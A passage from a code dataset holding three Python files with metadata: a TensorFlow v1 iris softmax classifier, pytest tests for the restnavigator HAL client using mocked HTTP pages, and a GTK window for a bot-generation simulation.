"program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "Levenshtein.distance", "line_number": 11, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 24, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 29, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 34, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 50, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 64, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 124, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 125, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 126, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 128, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 129, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "644235062", "text": "# 다중분류\n# iris 코드를 완성하시오\n\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior() #2.0기능 없애기\ntf.compat.v1.disable_eager_execution()\n# 1. 데이터\niris = load_iris()\nx_data = iris.data\ny_data = iris.target\n# print(x_data.shape) # (150, 4)\n# print(y_data.shape) # (150, )\n# print(y_data) # 0,1,2 3개분류\n\n# 1-1. y데이터 원핫인코딩\nsess = tf.Session()\ny_data = tf.one_hot(y_data, depth=3).eval(session=sess)\n# print(y_data.shape) # (150, 3)\ny_data = y_data.reshape(-1, 3)\n\n# 1-2. train_test_split\nx_train, x_test, y_train, y_test = train_test_split(x_data, y_data, random_state=88, train_size=0.8)\n# print(\"x_train, x_test\", x_)\n# print(x_test.shape)\n# print(y_train.shape)\n# print(y_test.shape)\n\n# 1-3. feed_dict에 feed 될 텐서를 위한 placeholder 설정\nx = tf.placeholder(tf.float32, shape=[None, 4])\ny = tf.placeholder(tf.float32, shape=[None, 3])\n\n# 2. 모델 구성\nw = tf.Variable(tf.random_normal([4, 3]), name='weight')\n# y 컬럼이 3개이기 때문에 shape를 3으로 맞춰줘야함\nb = tf.Variable(tf.random_normal([3]), name='bias')\n\n# keras110_9_softmax.py 원그래프 참조. 합쳐서 1이 나오게 변경\nh = tf.nn.softmax(tf.matmul(x, w) + b)\n# print(\"h: \", h)\n# h: Tensor(\"Softmax:0\", shape=(?, 3), dtype=float32)\n\n# 2-1. cost 손실함수(categorical_crossentropy) 정의\nloss = tf.reduce_mean(-tf.reduce_sum(y * tf.log(h), axis=1))\n\n# 2-2. loss를 최소화하는 옵티마이저 정의\nopt = tf.train.GradientDescentOptimizer(learning_rate=2e-2).minimize(loss)\n\n# 3. 훈련\n# 각 session에 컨텍스트 매니저가 있어서 with 구문 끝에서 자동으로 close()가 호출\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for step in range(2001):\n _, h_val, cost_val = sess.run([opt, h, loss], feed_dict={x: x_train, y: y_train})\n\n if step % 200 == 0:\n print(step, \"cost_val: \", cost_val)\n # 0 cost_val: 6.311684\n # 200 cost_val: 0.4222794\n # 400 cost_val: 0.34365538\n # 600 cost_val: 0.3002386\n # 800 cost_val: 0.26958433\n # 1000 cost_val: 0.24620421\n # 1200 cost_val: 0.2276606\n # 1400 cost_val: 0.21256508\n # 1600 cost_val: 0.20003031\n # 1800 cost_val: 0.18945326\n # 2000 cost_val: 0.18040702\n\n # tf.argmax(h,1)==h의 1(행)을 기준으로 최대값과 tf.argmax(y,1)==y의 1(행)을 기준으로 최대값이 같은 것을 pred로 지정\n pred = tf.equal(tf.argmax(h, 1), tf.argmax(y, 1))\n\n # pred와 y를 실수형으로 캐스팅해서 차원을 제거한 후 평균으로 acc 구하기\n acc = tf.reduce_mean(tf.cast(pred, dtype=tf.float32))\n print(\"Acc: \", sess.run(acc, feed_dict={x: x_test, y: y_test}))\n", "sub_path": "tf/tf12_iris.py", "file_name": "tf12_iris.py", "file_ext": "py", "file_size_in_byte": 2959, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tensorflow.compat.v1.disable_v2_behavior", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 9, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.compat.v1.disable_eager_execution", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.compat", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1", "line_number": 10, "usage_type": "name"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.Session", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 20, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.one_hot", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 21, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 33, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.float32", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 34, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.float32", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.Variable", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 37, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.random_normal", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.Variable", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 39, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.random_normal", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.nn.softmax", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1", "line_number": 42, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.matmul", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.reduce_mean", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 47, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.reduce_sum", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.log", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.train.GradientDescentOptimizer", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.train", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1", "line_number": 50, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.Session", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 54, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.global_variables_initializer", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 55, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.equal", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 75, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.argmax", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.reduce_mean", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 78, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.cast", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.float32", "line_number": 78, "usage_type": "attribute"}]} +{"seq_id": "562118955", "text": "'''Refactored tests from test_hal_nav.py'''\n\nimport json\n\nimport httpretty\nimport pytest\n\nimport conftest\n\nimport uritemplate\n\nimport restnavigator as RN\nfrom restnavigator import exc\nimport restnavigator.halnav as HN\n\n\ndef uri_of(doc):\n '''Pull out the url from a hal document'''\n return doc['_links']['self']['href']\n\ndef link_to(doc):\n '''Pull out the self link of a hal document'''\n return doc['_links']['self']\n\n\ndef register_hal_page(doc, **kwargs):\n def body_callback(request, url, headers):\n '''We do a callback so the response body can be updated'''\n return (\n kwargs.get('status', 200),\n kwargs.get('headers', headers),\n json.dumps(doc),\n )\n\n httpretty.HTTPretty.register_uri(\n kwargs.get('method', 'GET'),\n body=body_callback,\n content_type=kwargs.get('content_type', 'application/hal+json'),\n uri=uri_of(doc),\n **kwargs\n )\n\n@pytest.fixture\ndef page(index_page, curie_links, index_uri):\n '''Returns a function that creates pages'''\n def _page(name, number):\n selflink = {\n 'href': index_uri + name + '/' + str(number),\n 'name': name + str(number),\n }\n nextlink = {\n 'href': index_uri + name + '/' + str(number + 1),\n 'name': name + str(number + 1),\n }\n doc = {\n '_links': {\n 'self': selflink,\n 'curies': curie_links,\n 'next': nextlink\n },\n 'name': name,\n 'number': number,\n 'data': conftest.random_sentence(),\n }\n register_hal_page(doc)\n _page.registry.setdefault(name, []).append(doc)\n return doc\n _page.registry = {}\n return _page\n\n\n@pytest.yield_fixture\ndef http(request):\n '''Enables httpretty and disables it after the test'''\n httpretty.HTTPretty.enable()\n yield httpretty.HTTPretty\n httpretty.HTTPretty.disable()\n httpretty.HTTPretty.reset()\n\n\n@pytest.fixture\ndef index_uri():\n '''Fixture for the root uri'''\n return 'http://fakeuri.example/api/'\n\n@pytest.fixture\ndef curie():\n '''Returns the current curie string'''\n return conftest.random_word(2).lower()\n\n@pytest.fixture\ndef curify(curie):\n def _curify(rel):\n return curie + ':' + rel\n return _curify\n\n@pytest.fixture\ndef curie_links(curie, index_uri):\n '''Returns a templated curie link'''\n return [{\n 'name': curie,\n 'href': index_uri + 'rels/{rel}',\n 'templated': True,\n }]\n\n@pytest.fixture\ndef index_page(curie_links, index_uri, http):\n '''Registers a basic index page that can be extended'''\n doc = {\n '_links': {\n 'curies': curie_links,\n 'self': {'href': index_uri},\n },\n 'data': conftest.random_paragraphs(),\n }\n register_hal_page(doc)\n return doc\n\n\n@pytest.fixture\ndef N(index_uri, index_page):\n '''A basic HALNavigator with the index_uri as root'''\n return RN.Navigator.hal(index_uri)\n\n\nclass TestTemplateThunk:\n '''tests for halnav.TemplatedThunk'''\n\n @pytest.fixture\n def rel(self, curify, name):\n '''The link relation for the templated link'''\n return curify(name)\n\n @pytest.fixture(params=[set(['x']), set(['x', 'y']), set(['x', 'y', 'z'])])\n def vars(self, request):\n '''A set of random variables'''\n return request.param\n\n @pytest.fixture(params=[(0,0,0), (1,2,3)])\n def values(self, request):\n return dict(zip('xyz', request.param))\n\n @pytest.fixture\n def name(self):\n '''The name of the templated resource'''\n return conftest.random_word(5).lower() + 's'\n\n @pytest.fixture\n def post_template(self, name, index_uri, index_page, rel, vars):\n '''Creates and registers a post templated link'''\n href = \"{index_uri}{name}/{{{varpath}}}\".format(\n index_uri=index_uri,\n name=name,\n varpath='}/{'.join(v for v in sorted(vars))\n )\n link = {\n 'href': href,\n 'title': 'Templated link for ' + name,\n 'templated': True,\n }\n index_page['_links'][rel] = link\n return href\n\n @pytest.fixture\n def tpl_rel(self, name, curify):\n return curify(name + '_tpl')\n\n @pytest.fixture\n def posts(self, rel, name, index_uri, index_page, page, tpl_rel):\n '''Creates and registers some posts'''\n resource0 = page(name, 0)\n index_page['_links'][rel] = link_to(resource0)\n index_page['_links'][tpl_rel] = {\n 'href': index_uri + name + '/{id}',\n 'title': 'Template for ' + name,\n 'templated': True,\n }\n register_hal_page(resource0)\n last = resource0\n for i in range(1, 5):\n resource = page(name, i)\n last['_links']['next'] = link_to(resource)\n last = resource\n register_hal_page(resource)\n return page.registry[name][:]\n\n @pytest.fixture\n def template_thunk(self, rel, index_page, N, post_template):\n return N[rel]\n\n def test_template_uri(self, template_thunk, post_template):\n assert template_thunk.template_uri == post_template\n\n def test_expand_uri(\n self, vars, post_template, template_thunk, values):\n uri = template_thunk.expand_uri(**values)\n assert uri == uritemplate.expand(post_template, values)\n\n def test_expand_link(\n self, vars, post_template, template_thunk, values):\n link = template_thunk.expand_link(**values)\n assert not link.props.get('templated', False)\n assert link.uri == uritemplate.expand(post_template, values)\n\n def test_expand(self, vars, post_template, template_thunk, values):\n post1 = template_thunk(**values)\n assert not post1.fetched\n assert post1.uri == uritemplate.expand(post_template, values)\n\n def test_variables(self, template_thunk, vars):\n assert template_thunk.variables == vars\n\n @pytest.mark.parametrize('i', range(0, 5))\n def test_valid_expansion(self, posts, name, N, tpl_rel, i):\n thunk = N[tpl_rel]\n nav = thunk(id=i)\n nav.fetch()\n assert nav.status == (200, 'OK')\n assert nav.uri == uri_of(posts[i])\n\n\nclass TestHALNavGetItem:\n '''Tests the __getitem__ method of HALNavigator '''\n\n @pytest.fixture\n def names(self):\n namelist = [conftest.random_word().lower() for _ in range(3)]\n def _names(i):\n return namelist[i]\n return _names\n\n @pytest.fixture\n def rels(self, names, curify):\n def _rels(i):\n return curify(names(i))\n return _rels\n\n @pytest.fixture\n def resources(self, names, rels, index_page, index_uri, page):\n last = index_page\n for i in range(3):\n new = page(names(i), i)\n last['_links'][rels(i)] = {\n 'href': uri_of(new),\n 'title': \"Page for \" + names(i)\n }\n last = new\n\n def test_fetch_behavior(self, N, resources, rels):\n Na = N[rels(0)]\n Nb = N[rels(0), rels(1)]\n assert Na.fetched\n assert not Nb.fetched\n\n def test_sequence_equivalence(self, N, resources, rels):\n Na = N[rels(0), rels(1), rels(2)]\n Nb = N[rels(0)][rels(1)][rels(2)]\n assert Na is Nb\n\n @pytest.fixture\n def link_resources(self, rels, names, index_page, page):\n first = page(names(0), 1)\n index_page['_links'][rels(0)] = link_to(first)\n register_hal_page(first)\n second1 = page(names(1), 1)\n second2 = page(names(1), 2)\n first['_links'][rels(1)] = [\n {\n 'href': uri_of(second1),\n 'name': 'name_x',\n },{\n 'href': uri_of(second2),\n 'name': 'name_y',\n }\n ]\n register_hal_page(second1)\n register_hal_page(second2)\n third_1 = page(names(2), 1)\n third_2 = page(names(2), 2)\n second1['_links'][rels(2)] = link_to(third_1)\n second2['_links'][rels(2)] = link_to(third_2)\n register_hal_page(third_1)\n register_hal_page(third_2)\n\n def test_linklist_in_sequence(self, N, link_resources, rels):\n Nchained = N[rels(0), rels(1), 'name':'name_x', rels(2)]\n Nfirst = N[rels(0)]\n Nsecondlist = Nfirst[rels(1)]\n Nsecond = Nsecondlist.get_by('name', 'name_x')\n Nthird = Nsecond[rels(2)]\n\n assert Nchained is Nthird\n\n def test_linklist_index(self, N, link_resources, rels):\n Nchained = N[rels(0), rels(1), 1, rels(2)]\n Nfirst = N[rels(0)]\n Nsecondlist = Nfirst[rels(1)]\n Nsecond = Nsecondlist[1]\n Nthird = Nsecond[rels(2)]\n assert Nchained is Nthird\n\n def test_bad_rel(self, N, link_resources, rels):\n with pytest.raises(exc.OffTheRailsException):\n N[rels(1)]\n\n with pytest.raises(exc.OffTheRailsException):\n N[rels(0), rels(0)]\n\n def test_bad_name(self, N, link_resources, rels):\n with pytest.raises(exc.OffTheRailsException):\n N[rels(0), rels(1), 'name':'badname']\n\n def test_bad_index(self, N, link_resources, rels):\n with pytest.raises(exc.OffTheRailsException):\n N[rels(0), rels(1), 100]\n\n @pytest.fixture\n def template_uri(self, index_uri):\n return index_uri + 'tpl/{id}'\n\n @pytest.fixture\n def tpl_rel(self, curify):\n return curify('tpl')\n\n @pytest.fixture\n def tpl_resources(self, page, tpl_rel, template_uri, index_page):\n index_page['_links'][tpl_rel] = {\n 'href': template_uri,\n 'templated': True,\n 'title': 'Template link',\n }\n for i in range(3):\n resource = page('tpl', i)\n register_hal_page(resource)\n return template_uri\n\n def test_template_sequence(self, N, tpl_resources, tpl_rel):\n Na = N[tpl_rel](id=0)\n Nb = N[tpl_rel](id=1)\n Nc = N[tpl_rel](id=2)\n Na(), Nb(), Nc()\n assert Na.status == (200, 'OK')\n assert Nb.status == (200, 'OK')\n assert Nc.status == (200, 'OK')\n\n\n@pytest.mark.xfail(reason=\"Embedded not implemented yet\")\nclass TestEmbedded:\n '''tests for embedded document features'''\n\n\n @pytest.fixture\n def blog_posts(self, http):\n '''Posts are both linked and embedded'''\n _posts = [self.page('post', x) for x in range(3)]\n for post in _posts:\n register_hal_page(post)\n return _posts\n\n @pytest.fixture\n def comments(self, page):\n '''Comments are embedded only and have no self link'''\n comments = [page('comments', x) for x in range(3)]\n for comment in comments:\n del comment['_links']['self']\n return comments\n\n @pytest.fixture\n def index(self, index_uri, comments, blog_posts, http):\n doc = {\n '_links': {\n 'curies': [{\n 'name': 'xx',\n 'href': index_uri + 'rels/{rel}',\n 'templated': True,\n }],\n 'self': {'href': index_uri},\n 'first': link_to(blog_posts[0]),\n 'xx:second': link_to(blog_posts[1]),\n 'xx:posts': [link_to(post) for post in blog_posts]\n },\n 'data': 'Some data here',\n '_embedded': {\n 'xx:posts': blog_posts,\n 'xx:comments': comments,\n }\n }\n register_hal_page(doc)\n return doc\n\n def test_only_idempotent(self, N, index):\n assert not N['xx:comments'][0].idempotent\n\n def test_length_accurate(self, N, index, comments):\n assert len(N['xx:comments']) == len(comments)\n\n def test_links_and_embedded(self, N, index):\n assert 'xx:comments' in N\n assert 'xx:comments' not in N.links\n assert 'xx:comments' in N.embedded\n assert 'xx:posts' in N\n assert 'xx:posts' in N.links\n assert 'xx:posts' in N.embedded\n", "sub_path": "tests/test_hal_nav2.py", "file_name": "test_hal_nav2.py", "file_ext": "py", "file_size_in_byte": 12068, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "httpretty.HTTPretty.register_uri", "line_number": 35, "usage_type": "call"}, {"api_name": "httpretty.HTTPretty", "line_number": 35, "usage_type": "attribute"}, {"api_name": "conftest.random_sentence", "line_number": 63, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 43, "usage_type": "attribute"}, {"api_name": "httpretty.HTTPretty.enable", "line_number": 75, "usage_type": "call"}, {"api_name": "httpretty.HTTPretty", "line_number": 75, "usage_type": "attribute"}, {"api_name": "httpretty.HTTPretty", "line_number": 76, "usage_type": "attribute"}, {"api_name": "httpretty.HTTPretty.disable", "line_number": 77, "usage_type": "call"}, {"api_name": "httpretty.HTTPretty", "line_number": 77, "usage_type": "attribute"}, {"api_name": "httpretty.HTTPretty.reset", "line_number": 78, "usage_type": "call"}, {"api_name": "httpretty.HTTPretty", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pytest.yield_fixture", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 81, "usage_type": "attribute"}, {"api_name": "conftest.random_word", "line_number": 89, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 97, "usage_type": "attribute"}, {"api_name": "conftest.random_paragraphs", "line_number": 114, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 106, "usage_type": "attribute"}, {"api_name": "restnavigator.Navigator.hal", "line_number": 123, "usage_type": "call"}, {"api_name": "restnavigator.Navigator", "line_number": 123, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 134, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 139, "usage_type": "call"}, {"api_name": "conftest.random_word", "line_number": 146, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 143, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 148, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 164, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 187, "usage_type": "attribute"}, {"api_name": "uritemplate.expand", "line_number": 197, "usage_type": "call"}, {"api_name": "uritemplate.expand", "line_number": 203, "usage_type": "call"}, {"api_name": "uritemplate.expand", "line_number": 208, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 213, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 213, "usage_type": "attribute"}, {"api_name": "conftest.random_word", "line_number": 227, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 225, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 232, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 238, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 260, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 303, "usage_type": "call"}, {"api_name": "restnavigator.exc.OffTheRailsException", "line_number": 303, "usage_type": "attribute"}, {"api_name": "restnavigator.exc", "line_number": 303, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 306, "usage_type": "call"}, {"api_name": "restnavigator.exc.OffTheRailsException", "line_number": 306, "usage_type": "attribute"}, {"api_name": "restnavigator.exc", "line_number": 306, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 310, "usage_type": "call"}, {"api_name": "restnavigator.exc.OffTheRailsException", "line_number": 310, "usage_type": "attribute"}, {"api_name": "restnavigator.exc", "line_number": 310, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 314, "usage_type": "call"}, {"api_name": "restnavigator.exc.OffTheRailsException", "line_number": 314, "usage_type": "attribute"}, {"api_name": "restnavigator.exc", "line_number": 314, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 317, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 321, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 325, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 352, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 360, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 368, "usage_type": "attribute"}, {"api_name": "pytest.mark.xfail", "line_number": 347, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 347, "usage_type": "attribute"}]} +{"seq_id": "15974386", "text": "\"\"\"Generation app.\"\"\"\nimport gi\ngi.require_version(\"Gtk\", \"3.0\")\nfrom gi.repository import Gtk, GLib\nfrom canvas import Canvas\n\n\nclass DrawingWindow(Gtk.Window):\n\n def __init__(self):\n super(Gtk.Window, self).__init__(title=\"DrawingArea\")\n self.energy = 200\n self.__create_interface()\n\n def __create_interface(self):\n self.maximize()\n self.set_position(Gtk.WindowPosition.CENTER)\n\n box_master = Gtk.Box()\n box_master.set_border_width(5)\n self.add(box_master)\n\n left_box = Gtk.Box()\n box_master.pack_start(left_box, True, True, 0)\n\n separator = Gtk.VSeparator()\n box_master.pack_start(separator, False, False, 5)\n\n right_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)\n right_box.set_size_request(150, -1)\n box_master.add(right_box)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n execute_button = Gtk.ToggleButton(\"Start\")\n execute_button.set_active(False)\n execute_button.connect(\"toggled\", self.on_execute)\n right_box.pack_start(execute_button, False, True, 0)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n label = Gtk.Label(\"Count bots\")\n right_box.pack_start(label, False, True, 0)\n self.count_bots_entry = Gtk.Entry()\n self.count_bots_entry.set_text(str(0))\n self.count_bots_entry.set_editable(False)\n right_box.pack_start(self.count_bots_entry, False, True, 0)\n\n label = Gtk.Label(\"Generation\")\n right_box.pack_start(label, False, True, 0)\n self.generation_entry = Gtk.Entry()\n self.generation_entry.set_text(str(0))\n self.generation_entry.set_editable(False)\n right_box.pack_start(self.generation_entry, False, True, 0)\n\n label = Gtk.Label(\"Mutatuins\")\n right_box.pack_start(label, False, True, 0)\n self.mutation_entry = Gtk.Entry()\n self.mutation_entry.set_text(str(0))\n self.mutation_entry.set_editable(False)\n right_box.pack_start(self.mutation_entry, False, True, 0)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n space = Gtk.Alignment()\n right_box.pack_start(space, True, True, 0)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n label = Gtk.Label(\"Energy\")\n right_box.pack_start(label, False, True, 0)\n self.energy_s_button = Gtk.SpinButton()\n adjuctment = Gtk.Adjustment(0.0, 0.0, 1000.0, 10.0, 50.0, 0.0)\n self.energy_s_button.set_adjustment(adjuctment)\n self.energy_s_button.set_value(self.energy)\n self.energy_s_button.connect(\"changed\", self.on_changed_energy)\n right_box.pack_start(self.energy_s_button, False, True, 0)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n button_box = Gtk.ButtonBox()\n right_box.pack_start(button_box, False, True, 0)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n self.apply_energy_button = Gtk.Button(\"Apply\")\n self.apply_energy_button.set_sensitive(False)\n self.apply_energy_button.connect(\"clicked\", self.on_apply_energy)\n button_box.add(self.apply_energy_button)\n\n close_button = Gtk.Button(\"Close\")\n close_button.connect(\"clicked\", Gtk.main_quit)\n button_box.add(close_button)\n\n self.scroll_box = Gtk.ScrolledWindow()\n self.scroll_box.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.NEVER)\n left_box.pack_start(self.scroll_box, True, True, 0)\n\n self.canvas = Canvas(\n energy=self.energy\n )\n self.scroll_box.add(self.canvas)\n\n def on_execute(self, button):\n if button.get_active():\n # self.canvas.run()\n # self.__timeout_id = GLib.timeout_add(10, self.on_start, self)\n self.__timeout_id = GLib.timeout_add(100, self.on_start, self)\n button.set_label(\"Stop\")\n else:\n # self.canvas.stop()\n GLib.source_remove(self.__timeout_id)\n del self.__timeout_id\n button.set_label(\"Start\")\n\n def on_changed_energy(self, spin):\n if self.energy == spin.get_value_as_int():\n self.apply_energy_button.set_sensitive(False)\n else:\n self.apply_energy_button.set_sensitive(True)\n\n def on_apply_energy(self, widget):\n self.energy = self.energy_s_button.get_value_as_int()\n widget.set_sensitive(False)\n self.canvas.set_data(True)\n\n def on_start(self, widget):\n widget.canvas.queue_draw()\n return True\n", "sub_path": "window.py", "file_name": "window.py", "file_ext": "py", "file_size_in_byte": 4767, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "gi.require_version", "line_number": 3, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 8, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 8, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 11, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 11, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.WindowPosition", "line_number": 17, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 17, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 19, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 19, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 23, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 23, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.VSeparator", "line_number": 26, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 26, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 29, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 29, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Orientation", "line_number": 29, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 33, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 33, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ToggleButton", "line_number": 36, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 36, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 41, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 41, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 44, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 44, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 46, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 46, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 51, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 51, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 53, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 53, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 58, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 58, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 60, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 60, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 65, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 65, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Alignment", "line_number": 68, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 68, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 71, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", 